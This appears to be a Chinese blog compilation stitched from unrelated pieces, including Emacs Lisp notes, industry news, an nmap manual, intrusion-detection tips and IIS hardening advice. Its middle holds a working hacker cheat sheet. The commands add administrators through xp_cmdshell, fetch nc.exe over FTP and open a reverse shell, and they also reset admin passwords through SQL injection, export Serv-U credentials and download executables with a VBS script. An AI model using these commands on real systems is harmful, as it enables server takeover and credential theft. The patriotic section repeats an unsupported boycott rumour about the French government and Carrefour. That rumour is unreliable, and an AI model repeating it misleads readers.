(1+ a)         ; a+1

(+ 2 a)        ; a+2

(* 1 2 3 4)    

(current-buffer)   ; 传回目前buffer的资料物件

(switch-to-buffer (other-buffer))

(set-buffer)

(buffer-size)

(setq current-pos (point))

(point-min)

(point-max)

(message "Hello")    ; 在minibuffer显示Hello

(if (test)

      (then-part)

      (else-part))

(cond ((test1) BODY1)

       ((test2) BODY2)

       (t   OTHER-WISE)

(let ((var1 value)   ; local variable

        var2              ; no value

         (var3 value)

         ...)

         BODY ...)

(lambda (ARG-LIST) ...) 同 defun, 但是没有名字 (anonymous).

可以存到变数去:

(setq hello (lambda () (message "Hello,World")))

(funcall hello)

(goto-char (point-max))

(defvar VAR VALUE "*注解") 如果VAR 不存在才定义. 有注解可以用

    C-h v 看. 注解打*号表是使用者可以直接改/ 这个变数本来就是

              给使用者设定用的.

              可以用 M-x edit-options 来线上设定 (emacs结束就没有了,

              不过edit-options可以给你所有可修改的变数的列表,你可以

              放到.emacs档内.

(directory-files "./" t "\\..*")

          return a list of files under directory X

(load "xxxx.el")   同#include <stdio.h>

              给使用者设定用的.

              可以用 M-x edit-options 来线上设定 (emacs结束就没有了,

              不过edit-options可以给你所有可修改的变数的列表,你可以

              放到.emacs档内.

(directory-files "./" t "\\..*")

          return a list of files under directory X

(load "xxxx.el")   同#include <stdio.h>

(setq load-path (cons "~/emacs" load-path)) ; load的search path.

(autoload ...) 不像load会直接evaluate 整个档案, 而是需要时再

                load.

(local-unset-key [(control c)])

(local-set-key [(control c) a] 'forward-sexp)

sexp 就是一个expession, n个expression如果用括号括起来就算一个.

       (expression的定义随语言的不同而有不同, 在C, lisp

         tex, html, fortran 下皆有差异)

当哆啦A梦成为日本文化的代言人后，人们才真正意识到动漫对于文化传播的作用。因此，继投资国内网络游戏产业后，海外资本又将重点转向了动漫产业。日前，凯鹏华盈创投基金(KPCB China)将千万级美元风险投资投向国内动漫学院。与此同时，方正科技也设立了“游戏动漫专项奖学金”，侧重动漫人才的重点培养。

    国内动画从业者不足1万人

　　无论是“花生狗”SNOOPY还是凯蒂猫KITTY，都已经成为国内家喻户晓的“人物”。统计显示，我国目前动漫受众人数达到5亿人。国内有2000家省市电视台，其中动画专业频道有4个、少儿频道有25个、少儿栏目有289个、动画栏目200个，年需求达到26万分钟。但是，国产量仅有2万分钟。从5月起，广电部门延长境外动画片禁播时段，也为国产动漫提供了新的要求和发展空间。

　　根据IResearch最新发布的《2007年中国新媒体动漫研究报告》显示，2006年中国网络动漫市场规模突破1000万元，较前一年增长25%。预计到2010年将达到7900万元。然而，面对“内容为王”的新兴精神文化产业，优秀的动漫人才严重匮乏却成为制约整个产业发展的瓶颈。

　　 据国内一家招聘网监测数据显示，从2月下旬开始，国内主要城市动漫类有效职位供给较年前增长42%。但就数据统计，收到简历仅是招聘需求数量的80%。目前，我国影视动画人才总需求量至少在15万人以上，而实际从业者不足1万人

动漫暑期夏令营开班

欢迎大家报名咨询,报名咨询电话:13426335470  010-86702600  高老师

详情请见:http://www.3danimate.com.cn/

权限设置
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
cacls d:\website /g everyone /e /t授与完全控制
cacls d:\website /r everyone /e /t取消完全控制
SA加系统用户
exec master.dbo.xp_cmdshell 'net user admin admin /add'

exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

恢复扩散
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

如果恢复不了的解释:
因为管理员是直接删除dll文件，而没删除存储过程，你这样恢复肯定是提示存储过程已存在了。你要先删除存储过程，use master
EXEC sp_dropextendedproc 'xp_cmdshell'

然后上传xplog70.dll到某个目录，例如C盘根目录，然后执行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存储过程执行系统指令了。

MB的没想到网关都能用NB这样设..落伍啦.落伍啦
把他设置成网关看看行不行.在NBSI执行命令那里输入：echo interface ip >ip.txt
echo set address "Backup" static 10.90.90.157 255.255.255.0 10.90.90.14 1 >>ip.txt
netsh exec ip.txt
这样就把网关设置为10.90.90.14了，然后我们ipconfig看看是不是有网关了，

echo interface ip >1.txt
echo set address "本地连接" static 192.168.1.2 255.255.255.0 192.168.1 254 1 >>1.txt
netsh exec 1.txt

address"本地连接的名称" 可以用ipconfig得到. static IP地址 子网掩码网关地址。
好了现在我PING下163看看能不能PING通，如图8

命令行FTP下载文件
echo open ip >11.txt
echo user >>11.txt
echo pass >>11.txt
echo get nc.exe >>11.txt
echo bye >>11.txt
ftp -s:11.txt

NC做反弹SHELL
在本地监听1234端口 nc -vv -l -p 1234

然后在NBSI执行命令那里nc -e cmd.exe ip 1234

改密码地
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]

查看系统在线用户
query user
注销用户
logoff
D:\web\rar.exe a -k -r -s -m1 D:\web\zhu.rar D:\web\
把站点打包到zhu.rar里，

参数说明:

a 添加文件到压缩文件中

-k 锁定压缩文件

-s产生固体存档,这样可以增大压缩比

-r包括子目录

-m1 设置压缩比

-m0 存储 添加到压缩文件时不压缩文件。
-m1 最快 使用最快方式(低压缩)
-m2 较快 使用快速压缩方式
-m3 标准 使用标准(默认)压缩方式
-m4 较好 使用较好压缩方式(较好压缩，但是慢)
-m5 最好 使用最大压缩方式(最好的压缩，但是最慢

直接 D:\web\rar.exe a -r D:\web\zhu.rar D:\web\ 效果一样

exec xp_cmdshell 'echo 内容 >>绝对路径'

sc stop MSSQLSERVER
sc config MSSQLSERVER start= disabled

导SERV-U用户.和密码,不过现在版本密码加密了``

regedit /e "D:\hosting\wwwroot\systones_com\htdocs\su.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"

导入是regedit /s xx.reg

端口:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

tftp -i serverip get xx.exe

TFTP –I 127.0.0.1 get common.dll c:\common.dll

VBS
--
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/u.txt",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\jp.exe",2

VPN
关防火和Application Layer Gateway Service

3389登陆
mstsc /console /v:IP:终端端口

1. 检视连线记录档中是否有不寻常的来源位置或不寻常的操作动作。例如, 检查你最後

的登录时间, 程序的执行记录以及syslog所做的记录。除非你的记录档写在只能新

增资料(append-only)的边上, 不然这些动作不可忽略。许多的入侵者会修改记录档

来隐藏他们的行踪。

2.找出系统中所有setuid及setgid的档案(特别是setuid成root的档案)。入侵者经常喜欢留

下setuid root的/bin/sh或/bin/time, 如此当他以後再登入时便能轻易拥有root的权

限。在

UNIX系统中, find这个指令可以帮我们找出setuid及setgid的档案。你可以使用以下命

令来找出整个档案系统中所有setuid root和setgid kmem的档案

find / -user root -perm -4000 -print

find / -group kmem -perm -2000 -print

上列的例子会搜寻整个档案系统, 包括NFS及AFS。有些find命令支援一个”-xdev”的参

数，可用来避免搜寻非本机的档案系统, 如下所示:

find / -user root -perm -4000 -print -xdev

另外我们也可以用ncheck找出某一磁碟分割区中所有setuid的档案。例如我们可以使用

下列的命令, 找出分割区/dev/rsd0g中所有的setuid档案:

ncheck -s /dev/rsd0g

3.检查你系统的执行档看看它们是否被修改了。入侵者会修改UNIX系统的程式, 如login、

su、telnet、netstat、ifconfig、ls、find、du、df、libc、sync、任何在

/etc/inet.conf

记载的程式及其它重要的网路及系统程式和分享资源的程式库。用未经修改的备份来和你

目前的系统做比较, 例如你可以用系统安装片里的资料来比较。要特别小心挑选你拿来做

比较的备份，不注意的话它可能本身就含有木马程式。

4.检查你系统中是否有正在执行网路监听程式(sniffer)。入侵者可能透过监听程式取得使

用者帐号及密码。相关的讯息请参阅CERT advisory CA-94:01，网址:

http://www.cert.org/advisories/CA-94.01.ongoing.network.monitoring.attacks.html

5.检查系统中所有由”cron”和”at”所执行的程式。入侵者可能会留下後门并由”cron”

或

”at”来执行它。即使你後来在别的程式做了连线位置的限定, 入侵者依旧可以透过这个

後门回到系统中。另外, 我们也要检查那些被”cron”或”at”执行的程式属性, 要避免

任

何人都能写入修改它们。

6.检查/etc/inetd.conf的资料，注意是否有被更动，尤其是更动成执行shell程式(如

/bin/sh，/bin/csh), 并检查各服务的对应程式是否正确，已避免被改换成木马程式。

并检查/etc/inetd.conf的各种服务是否有原本不提供的服务被开启。另外你也须检

查那些正常，但已被你关掉的服务，因为入侵者可能会打开原本你先前关掉的服务，或

者是用木马程式换掉inetd程式。

7.检查系统/etc/passwd的内容及档案属性的更动。基本上, 察看内容是否有管理者不知道

的新帐号、没有密码的帐号或uid与其它使用者相同(特别是uid 0, root) 的帐号。

8.检查你的系统与网路设定档。基本上，检查/etc/hosts.equiv，/etc/hosts.lpd,和所有

.rhosts档案, 看看是否有”+”(加号)或不应存在的host存在档案中。并且不可让任何人

都可以写入这些档案。再者，确定这些档案不是被入侵者所创造的。

9.找出系统不寻常或隐藏的档案(档名以”.”开头或是只用”ls”看不到的档案),这些有可

能

是用来隐藏工具或资料用的。要在使用者目录底下放一个隐藏目录, 通常使用较奇特的档

名, 如”…” 或”.. “(点、点、空白)或者”..^G”(^G是control-G). 要如何找出这

些档

呢? 我们可以再使用”find”来帮我们找出这些档案, 如下:

find / -name ".. " -print -xdev

find / -name ".*" -print -xdev | cat -v

10.当你要检查机器是否被入侵, 你必须检查所有区域网路上的机器。大部分的情形是, 假

如一台机器被入侵了，很可能同一网段的其它机器也被入侵了。特别是当你使用NIS或

是使用了/etc/hosts.equiv或.rhosts这些设定档。

摘要

　　nmap是一个网络探测和安全扫描程序，系统管理者和个人可以使用这个软件扫描大型的网络，获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术，例如：UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。从扫描类型一节可以得到细节。nmap还提供了一些高级的特征，例如：通过TCP/IP协议栈特征探测操作系统类型，秘密扫描，动态延时和重传计算，并行扫描，通过并行ping扫描探测关闭的主机，诱饵扫描，避开端口过滤检测，直接RPC扫描(无须端口影射)，碎片扫描，以及灵活的目标和端口设定.

--------------------------------------------------------------------------------

1.名称

nmap-网络探测和安全扫描工具

2.语法

nmap [Scan Type(s)] [Options]

3.描述

　　nmap是一个网络探测和安全扫描程序，系统管理者和个人可以使用这个软件扫描大型的网络，获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术，例如：UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。从扫描类型一节可以得到细节。nmap还提供了一些高级的特征，例如：通过TCP/IP协议栈特征探测操作系统类型，秘密扫描，动态延时和重传计算，并行扫描，通过并行ping扫描探测关闭的主机，诱饵扫描，避开端口过滤检测，直接RPC扫描(无须端口影射)，碎片扫描，以及灵活的目标和端口设定。

　　为了提高nmap在non-root状态下的性能，软件的设计者付出了很大的努力。很不幸，一些内核界面(例如raw socket)需要在root状态下使用。所以应该尽可能在root使用nmap。

　　nmap运行通常会得到被扫描主机端口的列表。nmap总会给出well known端口的服务名(如果可能)、端口号、状态和协议等信息。每个端口的状态有：open、filtered、unfiltered。open状态意味着目标主机能够在这个端口使用accept()系统调用接受连接。filtered状态表示：防火墙、包过滤和其它的网络安全软件掩盖了这个端口，禁止 nmap探测其是否打开。unfiltered表示：这个端口关闭，并且没有防火墙/包过滤软件来隔离nmap的探测企图。通常情况下，端口的状态基本都是unfiltered状态，只有在大多数被扫描的端口处于filtered状态下，才会显示处于unfiltered状态的端口。

　　根据使用的功能选项，nmap也可以报告远程主机的下列特征：使用的操作系统、TCP序列、运行绑定到每个端口上的应用程序的用户名、DNS名、主机地址是否是欺骗地址、以及其它一些东西。

4.功能选项

　　功能选项可以组合使用。一些功能选项只能够在某种扫描模式下使用。nmap会自动识别无效或者不支持的功能选项组合，并向用户发出警告信息。

　　如果你是有经验的用户，可以略过结尾的示例一节。可以使用nmap -h快速列出功能选项的列表。

4.1 扫描类型

　　-sT

　　TCP connect()扫描：这是最基本的TCP扫描方式。connect()是一种系统调用，由操作系统提供，用来打开一个连接。如果目标端口有程序监听， connect()就会成功返回，否则这个端口是不可达的。这项技术最大的优点是，你勿需root权限。任何UNIX用户都可以自由使用这个系统调用。这种扫描很容易被检测到，在目标主机的日志中会记录大批的连接请求以及错误信息。

　　-sS

　　TCP同步扫描(TCP SYN)：因为不必全部打开一个TCP连接，所以这项技术通常称为半开扫描(half-open)。你可以发出一个TCP同步包(SYN)，然后等待回应。如果对方返回SYN|ACK(响应)包就表示目标端口正在监听；如果返回RST数据包，就表示目标端口没有监听程序；如果收到一个SYN|ACK包，源主机就会马上发出一个RST(复位)数据包断开和目标主机的连接，这实际上有我们的操作系统内核自动完成的。这项技术最大的好处是，很少有系统能够把这记入系统日志。不过，你需要root权限来定制SYN数据包。

　　-sF -sF -sN

　　秘密FIN数据包扫描、圣诞树(Xmas Tree)、空(Null)扫描模式：即使SYN扫描都无法确定的情况下使用。一些防火墙和包过滤软件能够对发送到被限制端口的SYN数据包进行监视，而且有些程序比如synlogger和courtney能够检测那些扫描。这些高级的扫描方式可以逃过这些干扰。这些扫描方式的理论依据是：关闭的端口需要对你的探测包回应RST包，而打开的端口必需忽略有问题的包(参考RFC 793第64页)。FIN扫描使用暴露的FIN数据包来探测，而圣诞树扫描打开数据包的FIN、URG和PUSH标志。不幸的是，微软决定完全忽略这个标准，另起炉灶。所以这种扫描方式对Windows95/NT无效。不过，从另外的角度讲，可以使用这种方式来分别两种不同的平台。如果使用这种扫描方式可以发现打开的端口，你就可以确定目标注意运行的不是Windows系统。如果使用-sF、-sX或者-sN扫描显示所有的端口都是关闭的，而使用SYN扫描显示有打开的端口，你可以确定目标主机可能运行的是Windwos系统。现在这种方式没有什么太大的用处，因为nmap有内嵌的操作系统检测功能。还有其它几个系统使用和windows同样的处理方式，包括Cisco、BSDI、HP/UX、MYS、IRIX。在应该抛弃数据包时，以上这些系统都会从打开的端口发出复位数据包。

　　-sP

　　ping扫描：有时你只是想知道此时网络上哪些主机正在运行。通过向你指定的网络内的每个IP地址发送ICMP echo请求数据包，nmap就可以完成这项任务。如果主机正在运行就会作出响应。不幸的是，一些站点例如：microsoft.com阻塞ICMP echo请求数据包。然而，在默认的情况下nmap也能够向80端口发送TCP ack包，如果你收到一个RST包，就表示主机正在运行。nmap使用的第三种技术是：发送一个SYN包，然后等待一个RST或者SYN/ACK包。对于非root用户，nmap使用connect()方法。

　　在默认的情况下(root用户)，nmap并行使用ICMP和ACK技术。

　　注意，nmap在任何情况下都会进行ping扫描，只有目标主机处于运行状态，才会进行后续的扫描。如果你只是想知道目标主机是否运行，而不想进行其它扫描，才会用到这个选项。

　　-sU

　　UDP扫描：如果你想知道在某台主机上提供哪些UDP(用户数据报协议,RFC768)服务，可以使用这种扫描方法。nmap首先向目标主机的每个端口发出一个0字节的UDP包，如果我们收到端口不可达的ICMP消息，端口就是关闭的，否则我们就假设它是打开的。

　　有些人可能会想UDP扫描是没有什么意思的。但是，我经常会想到最近出现的solaris rpcbind缺陷。rpcbind隐藏在一个未公开的UDP端口上，这个端口号大于32770。所以即使端口111(portmap的众所周知端口号) 被防火墙阻塞有关系。但是你能发现大于30000的哪个端口上有程序正在监听吗?使用UDP扫描就能！cDc Back Orifice的后门程序就隐藏在Windows主机的一个可配置的UDP端口中。不考虑一些通常的安全缺陷，一些服务例如:snmp、tftp、NFS 使用UDP协议。不幸的是，UDP扫描有时非常缓慢，因为大多数主机限制ICMP错误信息的比例(在RFC1812中的建议)。例如，在Linux内核中 (在net/ipv4/icmp.h文件中)限制每4秒钟只能出现80条目标不可达的ICMP消息，如果超过这个比例，就会给1/4秒钟的处罚。 solaris的限制更加严格，每秒钟只允许出现大约2条ICMP不可达消息，这样，使扫描更加缓慢。nmap会检测这个限制的比例，减缓发送速度，而不是发送大量的将被目标主机丢弃的无用数据包。

　　不过Micro$oft忽略了RFC1812的这个建议，不对这个比例做任何的限制。所以我们可以能够快速扫描运行Win95/NT的主机上的所有65K个端口。

　　-sA

　　ACK扫描：这项高级的扫描方法通常用来穿过防火墙的规则集。通常情况下，这有助于确定一个防火墙是功能比较完善的或者是一个简单的包过滤程序，只是阻塞进入的SYN包。

　　这种扫描是向特定的端口发送ACK包(使用随机的应答/序列号)。如果返回一个RST包，这个端口就标记为unfiltered状态。如果什么都没有返回，或者返回一个不可达ICMP消息，这个端口就归入filtered类。注意，nmap通常不输出unfiltered的端口，所以在输出中通常不显示所有被探测的端口。显然，这种扫描方式不能找出处于打开状态的端口。

　　-sW

　　对滑动窗口的扫描：这项高级扫描技术非常类似于ACK 扫描，除了它有时可以检测到处于打开状态的端口，因为滑动窗口的大小是不规则的，有些操作系统可以报告其大小。这些系统至少包括：某些版本的AIX、 Amiga、BeOS、BSDI、Cray、Tru64 UNIX、DG/UX、OpenVMS、Digital UNIX、OpenBSD、OpenStep、QNX、Rhapsody、SunOS 4.x、Ultrix、VAX、VXWORKS。从nmap-hackers邮件3列表的文档中可以得到完整的列表。

　　-sR

　　 RPC扫描。这种方法和nmap的其它不同的端口扫描方法结合使用。选择所有处于打开状态的端口向它们发出SunRPC程序的NULL命令，以确定它们是否是RPC端口，如果是，就确定是哪种软件及其版本号。因此你能够获得防火墙的一些信息。诱饵扫描现在还不能和RPC扫描结合使用。

　　-b

　　FTP反弹攻击(bounce attack):FTP协议(RFC 959)有一个很有意思的特征，它支持代理FTP连接。也就是说，我能够从evil.com连接到FTP服务器target.com，并且可以要求这台 FTP服务器为自己发送Internet上任何地方的文件！1985年，RFC959完成时，这个特征就能很好地工作了。然而，在今天的Internet 中，我们不能让人们劫持FTP服务器，让它向Internet上的任意节点发送数据。如同Hobbit在1995年写的文章中所说的，这个协议"能够用来做投递虚拟的不可达邮件和新闻，进入各种站点的服务器,填满硬盘，跳过防火墙，以及其它的骚扰活动，而且很难进行追踪"。我们可以使用这个特征，在一台代理FTP服务器扫描TCP端口。因此，你需要连接到防火墙后面的一台FTP服务器，接着进行端口扫描。如果在这台FTP服务器中有可读写的目录，你还可以向目标端口任意

全国哀悼日 建议站点换素装
全站CSS代码。
*{filter:gray; color:gray;}

加入CSS样式中。

经常设置完权限以后在使用后台时会提示：

Microsoft VBScript 运行时错误 错误 '800a0046'

没有权限

/foosun/admin/Refresh/Cls_Refresh.asp，行 421

这就是因为某一个目录的权限设置得过于严格了，导致文件无法创建。我们可以找到/foosun/admin/Refresh/Cls_Refresh.asp这个文件的421行，代码如下：

m_FSO.DeleteFile(f_Del_Path)

这是用FSO删除这个变量"f_Del_Path"

单看变量名我们是无法知道它是什么咯，毕竟不是我们自己写的程序当然不知道是什么咯。。于是我们加上一句：respose.write(f_Del_Path)输出显示这个变量名，刷新再看错误提示，代码如下：

E:\foosun\html\news\news\index.html
Microsoft VBScript 运行时错误 错误 '800a0046'

没有权限

/foosun/admin/Refresh/Cls_Refresh.asp，行 421

嘻嘻，到这里相信很多人都知道啦。。只要找到E:\foosun\html\news\news\index.html 这个文件看看他的目录权限设置是否正确就ok啦。。

这只是写给一些程序比较差的人看哦，老鸟可别笑话我。。努力学习ING！

藏独分子抢火炬被擒 地点：伦敦

08奥运受到外国人这样的待遇 地点：巴黎

让人心酸的照片 北京时间凌晨4点圣火抵达旧金山 无人的街头 年迈的老人只身支持奥运生活传递

再让大家看一位留学生发的帖子，由于有敏感词语被禁止提交，所以截图给大家看

可爱的巴基斯坦兄弟姐妹 在中国圣火传递受到藏独分子和许多法国人英国人等欧洲人阻挠还是勇敢的站了出来！

一个中国女孩，和她的同伴们一起一直在举着北京奥运的旗帜在追着火炬跑，当她看到记者的相机镜头对准她的时候，她先是激动的欢呼起来，然后禁不住流下了眼泪，然后又强忍住，努力微笑着让记者拍摄她。　这一张照片很令我们感动。有时候我们也许会对国家有许多抱怨，在那个一个瞬间，我只盼望更多的五星红旗会飘扬。美丽的中国姑娘！

下图为火炬遭抢现场，护送火炬座轮椅的姑娘叫金晶，是位残疾人，后面推轮椅的据说是位盲人...

看她的腿，心酸 看她的动作和表情，这就是中国人不屈的意志！！

她自己回忆下面这张图片时说："要想抢走我手上的圣火,先从我尸体上走过去！"

受到了惊吓委屈也没有哭出来的中国姑娘——金晶

金晶事后发给母亲的短信　开心的妈妈

金晶右侧穿黑衣服的GG，在藏独分子抢火炬的时候，他把自己价值不菲的摄像机愤怒地砸到藏独分子脸上

用摄象机拍人的留学生就是这么帅

红旗飘飘

中国留学生的热血沸腾了冰冷的喷泉

还是他

愤怒而团结的在外华人 不单是在法国的哦！

中国的声音！！！Tibet was,is,and always will be, a part of CHINA!!!

Do you know a true Tibet?

外国媒体，请不要再说谎！！！

世界各地的华人，这就是团结！一个民族的品质！

反对藏独，维护祖国统一的美丽身影...

?手持鲜艳的五星红旗，美丽无需浓妆艳抹

这是发自内心深处的呐喊

有人说过，心灵美才是真正的美丽

亭亭玉立，在寒风中她们毫不畏惧

美丽的背影，这就是美丽的诠释

五星红旗到映衬，一道靓丽的风景

为这届在我们的土地上举办的奥运，为反对祖国分裂维护主权完整做出我们的贡献！

中国，请不要哭泣，

千百年来中华民族经历无数风霜都不曾退缩，

藏独分子不会得逞，

亿万中华儿女会齐心协力。

加油，中国！加油,北京奥运！

重大消息: 法国政府准备拿出二千万美金，

家乐福自己再拿出五百万美金，用于五一降价促消，

听说家乐福高层很狂妄，让中国人在五一降价中挤破家乐福，最好踩死几个人．

法国电视台也在积极做准备，拍摄中国人到家乐福疯狂购物的镜像．让中国人自打自的嘴．

如你是爱国的中国人，把此信息传给你的亲戚朋友，

不要到家乐福购物，不要为了丁点的小便宜，而丢了尊严，丢了民族志气，让外国人笑话．

再不能让外国人把我们看作东亚病夫了.

虽然我们的努力可能微不足道,但大家团结起来一定要让外国人看看我们的力量

　　香港人的MSN QQ头像都是紫荆花

　　代表着大家齐心抗击非典；

　　如今他国抵制奥运

　　我们也该把头像都换成“我的中国心”!

　　向世人昭示我们的齐心合力

　　方法：

　　将下面的图象保存在硬盘

　　然后在QQ中修改个人资料~右边更换头像~

　　然后本地上传

各位同胞：

奥运圣火不断受到骚扰,尤其在巴黎。

巴黎市政府竟把藏独标语挂上市政大厦！

欧洲议会通过决议支持藏独为北京抹黑

美国众议院通过决议要抵制中国奥运！

德国总理公开支持藏独，不参加奥运!

面对21世纪的中国八国联军想干什么?

让全世界看看中国人团结的力量！

5月1日,让全国的家乐福冷场!

6月1日,让全国的肯德基冷场!

我们就是优秀的中国人！

我们就是最爱国的中国人！

中国人万众一心，团结起来，

让全世界看看!!!

正版中国心：

我真的不懂为什么我这篇文章会出现审核不通过的提示，也不告诉我为什么不通过。163难道连个解释都没有就不让我的文章显示了么？作为163的忠实用户我觉得很伤心！

       书生报国无他物.惟有手中笔作刀!还好.我们有智慧.我们有电脑.我们有Internet...自古男儿扬名在疆场.让我们在这网络天地中攻城掠地.给轻视中国.污辱中国人的暴民迎头痛击!~

在查询分析器里输入这段代码就可以清理掉日志了

DUMP  TRANSACTION   数据库名 WITH  NO_LOG   

dbcc shrinkfile('数据库名_Log',1)

也可以写一段存储过程来完成，以后每次只要在存储过程中使用命令如下：

Create  proc dbo.Delete_logData   ；存储过程名
as

DUMP  TRANSACTION   数据库名 WITH  NO_LOG   

dbcc shrinkfile('数据库名_Log',1)

     又一次莫明的烦躁.近来的工作好忙,一次次的失去目标,这个周末很苦，反感自己早早的醒来,如果就那么睡下去,也许可以轻松一点度过.孤单紧紧的包围着我,一切都提不起兴趣.曾经很感兴趣的技术文章现在也看不进去,夜夜买醉想求个好梦,可惜,好梦又在哪里呢.不知来自何处的压力让我无法呼吸.喜欢那种坐在小酒馆的角落里,注视着身边所有人的感觉,看他们的欢笑,看他们的愤怒,不知是羡慕还是失落.仿佛我什么都有，缺有什么都没有.今天是个好天气，阳光明媚,外面很暖和,我依旧蜷缩在自己的小屋里,窗外那明媚的阳光一点都照不到我心里.

   很乱,如果现在用纸写的话我相信我的字迹一定很潦草.那个自信的我不知跑到哪里去了,现在的我只是一个酒鬼,一个胆小鬼.聊过很多次了,近来才明白了好多,这一切都是我自愿做的,现在这样我没有资格去要求什么,不过做那些事的时候我都很开心也很充实.自愿的嘛,为了心里那点温存,那点温柔.这个世界上是有很多的不公平，也永远没有公平.很想说我的世界里已不能没有你,很想好好的告诉你你在我心里的位置.不过我现在再也张不开口了.也拿不出在工作里那自信的笑.很喜欢曾经的那个风格.更喜欢那个风格里的那一小段话:

谢幕，人潮散去。

我躲在幕后换下笑脸，不知该哭？

还是等待下一次开幕的欢笑...

虽然我是个同事朋友们公认的开心果,其实我的生活就像小丑一样,朋友们散去以后,我拿下那张笑脸,不知道该哭还是等待下一次开幕的欢笑...希望一缕阳光可以照到我的心里,让我在这阳春四月的时候可以暖暖的笑,拿下面具的笑.累还是累,身体,心灵...渴望那温柔的怀抱让我可以休息...偷偷的再说一次:honey, i love you will go on.Do not go away from me!

Do not go away from me!

注入漏洞、上传漏洞、弱口令漏洞等问题随处可见。跨站攻击，远程控制等等是再老套不过了的话题。有些虚拟主机管理员不知是为了方便还是不熟悉配置，干脆就将所有的网站都放在同一个目录中，然后将上级目录设置为站点根目录。有些呢，则将所有的站点的目录都设置为可执行、可写入、可修改。有些则为了方便，在服务器上挂起了QQ，也装上了BT。更有甚者，竟然把Internet来宾帐号加入到Administrators组中！汗……！普通的用户将自己的密码设置为生日之类的6位纯数字，这种情况还可以原谅，毕竟他们大部分都不是专门搞网络研究的，中国国民的安全意识提高还需要一段时间嘛，但如果是网络管理员也这样，那就怎么也有点让人想不通了。网络安全问题日益突出，最近不又有人声称“万网：我进来玩过两次了！”。这么有名气的网络服务商，也难免一逃啊！网站注入漏洞是最近还频频在报刊杂志上曝光的高校入侵……一句话，目前很大部分的网站安全状况让人担忧！  

　　这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例，跟大家共同探讨虚拟主机配置问题。  

　　一、建立Windows用户  

　　为每个网站单独设置windows用户帐号cert，删除帐号的User组，将cert加入Guest用户组。将用户不能更改密码，密码永不过期两个选项选上。  

　　二、设置文件夹权限  

　　1、设置非站点相关目录权限  

　　Windows安装好后，很多目录和文件默认是everyone可以浏览、查看、运行甚至是可以修改 的。这给服务器安全带来极大的隐患。这里就我个人的一些经验提一些在入侵中较常用的目录。  

　　C：\；D：\；……  
　　C:\perl  
　　C:\temp\  
　　C:\Mysql\  
　　c:\php\  
　　C:\autorun.inf  
　　C:\Documents and setting\  
　　C:\Documents and Settings\All Users\「开始」菜单\程序\  
　　C:\Documents and Settings\All Users\「开始」菜单\程序\启动  
　　C:\Documents and Settings\All Users\Documents\  
　　C:\Documents and Settings\All Users\Application Data\Symantec\  
[bitsCN_com]

　　C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere  
　　C:\WINNT\system32\config\  
　　C:\winnt\system32\inetsrv\data\  
　　C:\WINDOWS\system32\inetsrv\data\  
　　C:\Program Files\  
　　C:\Program Files\Serv-U\  
　　c:\Program Files\KV2004\  
　　c:\Program Files\Rising\RAV  
　　C:\Program Files\RealServer\  
　　C:\Program Files\Microsoft SQL server\  
　　C:\Program Files\Java Web Start\　　  

　　  
　　以上这些目录或文件的权限应该作适当的限制。如取消Guests用户的查看、修改和执行等权限。由于篇幅关系，这里仅简单提及。  

　　2、设置站点相关目录权限：  

　　A、设置站点根目录权限：将刚刚建立的用户cert给对应站点文件夹，假设为D：\cert设置相应的权限：Adiministrators组为完全控制；cert有读取及运行、列出文件夹目录、读取，取消其它所有权限。  

　　B、设置可更新文件权限：经过第1步站点根目录文件夹权限的设置后，Guest用户已经没有修改站点文件夹中任何内容的权限了。这显然对于一个有更新的站点是不够的。这时就需要对单独的需更新的文件进行权限设置。当然这个可能对虚拟主机提供商来说有些不方便。客户的站点的需更新的文件内容之类的可能都不一样。这时，可以规定某个文件夹可写、可改。如有些虚拟主机提供商就规定，站点根目录中uploads为web可上传文件夹，data或者database为数据库文件夹。这样虚拟主机服务商就可以为客户定制这两个文件夹的权限。当然也可以像有些做的比较好的虚拟主机提供商一样，给客户做一个程序，让客户自己设定。可能要做到这样，服务商又得花不小的钱财和人力哦。

三、配置IIS 　　

　　基本的配置应该大家都会，这里就提几个特殊之处或需要注意的地方。

　　1、主目录权限设置：这里可以设置读取就行了。写入、目录浏览等都可以不要，最关键的就是目录浏览了。除非特殊情况，否则应该关闭，不然将会暴露很多重要的信息。这将为黑客入侵带来方便。其余保留默认就可以了。

　　2、应用程序配置：在站点属性中，主目录这一项中还有一个配置选项，点击进入。在应用程序映射选项中可以看到，默认有许多应用程序映射。将需要的保留，不需要的全部都删除。在入侵过程中，很多程序可能限制了asp，php等文件上传，但并不对cer，asa等文件进行限制，如果未将对应的应用程序映射删除，则可以将asp的后缀名改为cer或者asa后进行上传，木马将可以正常被解析。这也往往被管理员忽视。另外添加一个应用程序扩展名映射，可执行文件可以任意选择，后缀名为.mdb。这是为了防止后缀名为mdb的用户数据库被下载。

